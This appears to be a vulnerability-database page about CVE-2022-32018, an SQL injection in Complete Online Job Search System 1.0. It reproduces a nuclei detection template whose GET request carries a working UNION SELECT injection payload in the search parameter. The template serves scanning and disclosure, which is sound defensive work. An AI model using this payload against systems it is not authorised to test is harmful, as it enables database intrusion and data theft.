Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Complete Online Job Search System 1.0 - SQL Injection

🗓️ 16 Jul 2022 20:49:29Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 12 Views

Complete Online Job Search System 1.0 SQL Injection via /eris/index.php?q=hiring&search=. Allows attacker to obtain sensitive information, modify data, execute unauthorized operations

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2022-32018
2 Jun 202216:15
cve
Cvelist		CVE-2022-32018
2 Jun 202215:22
cvelist
Prion		Sql injection
2 Jun 202216:15
prion
CNVD		Complete Online Job Search System SQL注入漏洞(CNVD-2022-48794)
9 Jun 202200:00
cnvd
NVD		CVE-2022-32018
2 Jun 202216:15
nvd
id: CVE-2022-32018

info:
  name: Complete Online Job Search System 1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.
  reference:
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32018
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-32018
    cwe-id: CWE-89
    epss-score: 0.01593
    epss-percentile: 0.87356
    cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: complete_online_job_search_system_project
    product: complete_online_job_search_system
  tags: cve,cve2022,sqli,complete_online_job_search_system_project
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 4a0a0047304502206a62004d0bc6be6d3c0356e6b327ee9fa1b3848c9d473cb0d1f29f27fd68fec2022100b92dafe3cf7ca09124344252280bfe72d03e031f86b7c493e7498a3822a3fe51:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Jul 2022 20:29Current
7.2High risk
Vulners AI Score7.2
CVSS26.5
CVSS37.2
EPSS0.03618
complete online job search systemsql injectiondatabase vulnerabilitysensitive information
12
.json
Report